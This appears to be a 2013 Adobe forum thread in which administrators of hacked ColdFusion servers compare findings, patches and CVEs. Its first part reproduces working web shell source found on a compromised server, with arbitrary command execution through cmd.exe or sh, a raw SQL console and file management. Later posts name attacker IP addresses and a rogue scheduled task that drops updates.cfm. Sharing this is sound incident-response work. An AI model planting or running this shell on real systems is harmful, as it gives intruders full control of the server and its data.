              &lt;cfoutput&gt;&lt;div&gt;#attributes.pathNew##attributes.delimiter#&lt;b&gt;#name#&lt;/b&gt; ... uptodate&lt;/div&gt;&lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;cffile <br>

              action=&quot;COPY&quot; <br>

              source=&quot;#attributes.path##attributes.delimiter##name#&quot; <br>

              destination=&quot;#attributes.pathNew##attributes.delimiter##name#&quot;<br>

              attributes=&quot;Normal&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;div style=&quot;color:green&quot;&gt;#attributes.pathNew##attributes.delimiter#&lt;b&gt;#name#&lt;/b&gt; ... new!&lt;/div&gt;&lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfflush&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;cfloop query=&quot;getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;dir&quot;&gt;<br>

              &lt;cfmodule <br>

              fuseaction=&quot;syncDir&quot;<br>

              template=&quot;#attributes.thisModule#&quot; <br>

              h=&quot;#attributes.H#&quot;<br>

              path=&quot;#attributes.path##attributes.delimiter##name#&quot;<br>

              pathNew=&quot;#attributes.pathNew##attributes.delimiter##name#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;button name=&quot;fileManagerButton&quot; style=&quot;width:700&quot; onclick=&quot;window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.pathNew)#'&quot;&gt;Synchronization done! Back to &lt;b&gt;#attributes.pathNew#&lt;/b&gt;&lt;/button&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;search&quot;&gt;<br>

              &lt;cfif attributes.searchtext eq &quot;&quot; and attributes.searchname eq &quot;&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error: no criteria!&quot;,attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif not isDefined(&quot;request.searchResult&quot;)&gt;<br>

              &lt;cfset request.searchResult = queryNew(&quot;path,name,type,size,datelastmodified,attributes&quot;)&gt;<br>

              &lt;cfset attributes.searchpath = attributes.path&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfset countsearchresult =  request.searchResult.recordCount&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfdirectory action=&quot;LIST&quot; directory=&quot;#attributes.searchpath#&quot; name=&quot;getDir&quot;&gt;<br>

              &lt;!--- Search files ---&gt;<br>

              &lt;cfloop query=&quot;getDir&quot;&gt;<br>

              &lt;cfif attributes.maxsearchresult lte countsearchresult&gt;<br>

              &lt;cfbreak&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif type eq &quot;file&quot;&gt;<br>

              &lt;cfset isOK = 1&gt;<br>

              &lt;cfif attributes.searchname neq &quot;&quot;&gt;<br>

              &lt;cfset isOK = REFindNoCase(attributes.searchname,name)&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif attributes.searchtext neq &quot;&quot; and isOK eq 1&gt;<br>

              &lt;cffile action=&quot;READ&quot; file=&quot;#attributes.searchpath##attributes.delimiter##name#&quot; variable=&quot;filecontent&quot;&gt;<br>

              &lt;cfset isOK = REFindNoCase(attributes.searchtext,filecontent)&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif isOK&gt;<br>

              &lt;cfset tmp = queryAddRow(request.searchResult)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;path&quot;,attributes.searchpath)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;name&quot;,name)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;type&quot;,type)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;size&quot;,size)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;datelastmodified&quot;,datelastmodified)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;attributes&quot;,attributes)&gt;<br>

              &lt;cfset countsearchresult =  countsearchresult + 1&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;!--- Search dir ---&gt;<br>

              &lt;cfloop query=&quot;getDir&quot;&gt;<br>

              &lt;cfif attributes.maxsearchresult lte countsearchresult&gt;<br>

              &lt;cfbreak&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif type eq &quot;dir&quot; and name neq &quot;.&quot; and name neq &quot;..&quot;&gt;<br>

              &lt;cfif attributes.searchname neq &quot;&quot; and REFindNoCase(attributes.searchname,name)&gt;<br>

              &lt;cfset tmp = queryAddRow(request.searchResult)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;path&quot;,attributes.searchpath)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;name&quot;,name)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;type&quot;,type)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;size&quot;,size)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;datelastmodified&quot;,datelastmodified)&gt;<br>

              &lt;cfset tmp = querySetCell(request.searchResult,&quot;attributes&quot;,attributes)&gt;<br>

              &lt;cfset countsearchresult =  countsearchresult + 1&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;!--- Search in sub dir ---&gt;<br>

              &lt;cfif attributes.recursive eq 1&gt;<br>

              &lt;cfloop query=&quot;getDir&quot;&gt;<br>

              &lt;cfif attributes.maxsearchresult lte countsearchresult&gt;<br>

              &lt;cfbreak&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif type eq &quot;dir&quot; and name neq &quot;.&quot; and name neq &quot;..&quot;&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;search&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              searchpath=&quot;#attributes.searchpath##attributes.delimiter##name#&quot;<br>

              recursive=&quot;#attributes.recursive#&quot;<br>

              searchtext=&quot;#attributes.searchtext#&quot;<br>

              searchname=&quot;#attributes.searchname#&quot;<br>

              maxsearchresult=&quot;#attributes.maxsearchresult#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error!&quot;,attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;!--- Show result ---&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfset caller.getDir = request.searchResult&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;home&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              msg=&quot;Search result: #request.searchResult.recordCount# elements!&quot;<br>

              getDir=&quot;#request.searchResult#&quot;<br>

              showpath=&quot;#iif(attributes.recursive,1,0)#&quot;<br>

              searchtext=&quot;#attributes.searchtext#&quot;<br>

              searchname=&quot;#attributes.searchname#&quot;<br>

              maxsearchresult=&quot;#attributes.maxsearchresult#&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;/cfswitch&gt;</p>

    <p>&lt;/br&gt;&lt;/br&gt;</p>

    <p>&lt;cfoutput&gt;<br>

              &lt;!--&lt;table&gt;--&gt;<br>

              &lt;cfset tempFile = #GetTempFile(GetTempDirectory(),&quot;testFile&quot;)# /&gt;<br>

              &lt;cfif IsDefined(&quot;FORM.cmd&quot;)&gt;<br>

              &lt;cfoutput&gt;#cmd#&lt;/cfoutput&gt;<br>

              &lt;cfif server.os.name neq &quot;UNIX&quot;&gt;<br>

              &lt;cfexecute name=&quot;cmd.exe&quot; arguments=&quot;/c #cmd#&quot; outputfile=&quot;#tempFile#&quot; timeout=&quot;2000&quot;&gt;&lt;/cfexecute&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;cfexecute name=&quot;sh&quot; arguments=&quot;-c &quot;&quot;#REReplace(cmd,&quot;&quot;&quot;&quot;,&quot;'&quot;,&quot;ALL&quot;)#&quot;&quot;&quot; outputfile=&quot;#tempFile#&quot; timeout=&quot;2000&quot;&gt;&lt;/cfexecute&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;form action=&quot;&lt;cfoutput&gt;#CGI.SCRIPT_NAME#&lt;/cfoutput&gt;&quot; method=&quot;post&quot;&gt;<br>

              &lt;input type=text size=45 name=&quot;cmd&quot; &gt;<br>

              &lt;input type=Submit value=&quot;run&quot;&gt;<br>

              &lt;/form&gt;<br>

              &lt;cfif FileExists(&quot;#tempFile#&quot;) is &quot;Yes&quot;&gt;<br>

              &lt;cffile action=&quot;Read&quot; file=&quot;#tempFile#&quot; variable=&quot;readText&quot;&gt;<br>

              &lt;textarea readonly cols=80 rows=20&gt;<br>

              &lt;CFOUTPUT&gt;#readText#&lt;/CFOUTPUT&gt;<br>

              &lt;/textarea&gt;<br>

              &lt;cffile action=&quot;Delete&quot; file=&quot;#tempFile#&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/br&gt;&lt;/br&gt;</p>

    <p>&lt;p&gt;&lt;b&gt;Notes:&lt;/b&gt;&lt;/p&gt;<br>

              &lt;ul&gt;<br>

              &lt;li&gt;Select the database you want to use&lt;/li&gt;<br>

              &lt;li&gt;Write SQL statements in the text box&lt;/li&gt;<br>

              &lt;/ul&gt;</p>

    <p>&lt;form method=&quot;POST&quot; action=&quot;&quot;&gt;<br>

              &lt;p&gt;&lt;b&gt;SQL Interface:&lt;/b&gt;&lt;/p&gt;<br>

              Datasource&lt;br&gt;<br>

              &lt;input type=&quot;text&quot; name=&quot;datasource&quot; /&gt;<br>

              &lt;br&gt;<br>

              SQL&lt;br&gt;<br>

              &lt;textarea name=&quot;sql&quot; rows=&quot;5&quot; cols=&quot;100&quot;&gt;&lt;/textarea&gt;<br>

              &lt;br&gt;<br>

              &lt;input type=submit value=&quot;Exec&quot;&gt;<br>

              &lt;/form&gt;</p>

    <p>&lt;cfif isdefined(&quot;form.sql&quot;)&gt;<br>

              &lt;cfquery name=&quot;runsql&quot; datasource=&quot;#Form.datasource#&quot; timeout=&quot;30&quot;&gt;<br>

              #REReplace(Form.sql,&quot;&quot;&quot;&quot;,&quot;'&quot;,&quot;ALL&quot;)#<br>

              &lt;/cfquery&gt;<br>

              &lt;/cfif&gt;</p>

    <p>&lt;table border=1&gt;<br>

              &lt;cfif isdefined(&quot;form.sql&quot;)&gt;<br>

              &lt;cfloop from=&quot;0&quot; to=&quot;#runsql.RecordCount#&quot; index=&quot;row&quot;&gt;<br>

              &lt;cfif row eq 0&gt;<br>

              &lt;tr&gt;<br>

              &lt;cfloop list=&quot;#runsql.ColumnList#&quot; index=&quot;column&quot; delimiters=&quot;,&quot;&gt;<br>

              &lt;th&gt;&lt;cfoutput&gt;#column#&lt;/cfoutput&gt;&lt;/th&gt; <br>

              &lt;/cfloop&gt;<br>

              &lt;/tr&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;tr&gt;<br>

              &lt;cfloop list=&quot;#runsql.ColumnList#&quot; index=&quot;column&quot; delimiters=&quot;,&quot;&gt;<br>

              &lt;td&gt;&lt;cfoutput&gt;#runsql[column][row]#&lt;/cfoutput&gt;&lt;/td&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/table&gt;<br>

              &lt;/br&gt; &lt;/br&gt;</p>

    <p> </p>

    <p>&lt;/body&gt;<br>

              &lt;/html&gt;</p>

    <p> &lt;cfelse&gt;<br>

              &lt;form method=&quot;post&quot;&gt;<br>

              &lt;label for=&quot;code&quot;&gt;Code:&lt;/label&gt;&lt;input type=&quot;text&quot; name=&quot;code&quot; /&gt;<br>

              &lt;br/&gt;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Login&quot; /&gt;<br>

              &lt;/form&gt;<br>

              &lt;/cfif&gt;</p>

    <p>&lt;cfcatch&gt;<br>

              &lt;/cfcatch&gt; <br>

              &lt;/cftry&gt;<br>

    </p>

    C
    Cenn_Raven
    Participant
    September 22, 2013

    Ok, I just looked in my scheduled tasks and found an entry that has the URL set to http://84.33.192.46/tmp/updates.txt and saves the output file to the cfide/updates.cfm

    !!!!!!!!!!!!!!!!

    http://84.33.192.46/tmp/updates.txt

    saves to updates.cfm

    http://216.164.204.70/CFIDE/sq.txt

    EclecticDan
    EclecticDan
    Participating Frequently
    February 19, 2013

    My server was also hacked with the "payday loans" code appearing on most index.cfm and index.html pages. After deleteing the injected code, it reappeared 3 days later. I believe I have since discovered the real culprit -- a modified application.cfm in the CFIDE directory.

    A
    Aeopile
    Known Participant
    February 20, 2013

    EcleticDan - what version of CF were your running, and were you fully patched?  Any suggestions on what we can do to protect ourselves?  I locked out /cfide/administrator so no one can get to it unless you RDC to the server.

    EclecticDan
    EclecticDan
    Participating Frequently
    February 20, 2013

    9.0 - I had not run the patches. A past upgrarde on version 8 corrupted the server causing a frantic evening of repair and making me leery of other patches. RDS has always been disabled on this server.

    According to the hotfix statement, all versions of ColdFusion seem to be susceptible, regardless of the latest fixes installed:
    http://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-03.html

    One of the files left befind had a date of 12/25/2012, which is weeks before any security notices were posted. Looking at old versions of index files, the first recorded incident of the injection wasn't until 2/3/2013. This may coincide with running the CF Administrator as I needed to set up a new datasource, which I don't do all that often and didn't have need to login to the Admin for a while.

    A
    Anonymous
    February 4, 2013

    I just had a crazy morning trying to figure out why our site was breaking, posting crazy text, ruining our redirect to mobile site, etc.  Then I found this post and saw the code that I discovered on our site with Firebug that matched exactly what you posted.  We are running CF9, and you say there is a patch?  Where might we find that?

    Thanks for your help.

    J
    JjboswellAuthor
    Participant
    February 4, 2013

    The CF9 patch is here : http://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-03.html

    S
    sduncanute
    Known Participant
    February 4, 2013

    I had this same problem this morning, and I am running 9.0.1 and already have hf901-00008.jar installed.. which means I have that patch already.  Any other ideas??

    A
    Adobe Employee
    AlbusTeck
    Adobe Employee
    February 4, 2013

    Hi Jeremy

    Can you please provide the CVE code?

    Regards

    Swaraj

    J
    JjboswellAuthor
    Participant
    February 4, 2013

    These are for CF9 and 10.  I've found nothing for CF8 yet.

    CVE-2013-0625, CVE-2013-0629, CVE-2013-0631 and CVE-2013-0632

    http://www.adobe.com/support/security/bulletins/apsb13-03.html

    A
    Adobe Employee
    AlbusTeck
    Adobe Employee
    February 4, 2013

    Hi Jeremy

    Below lines are mentioned in the article:

    Note that ColdFusion customers using an unsupported version of ColdFusion (including ColdFusion 8.x and earlier) can protect themselves from CVE-2013-0625, CVE-2013-0629 and CVE-2013-0632 by configuring the following:

    • Setting the password for Remote Development Services (even if RDS is disabled) 
    • Enabling password protection for RDS 
    • Setting the Admin password and enabling password protection for Administrator

    Can you please try them?

    Regards

    Swaraj

    Terms & ConditionsAccessibility statement
    Using the community Terms of use Privacy Cookie preferences Do not sell or share my personal information ad choicesAdChoices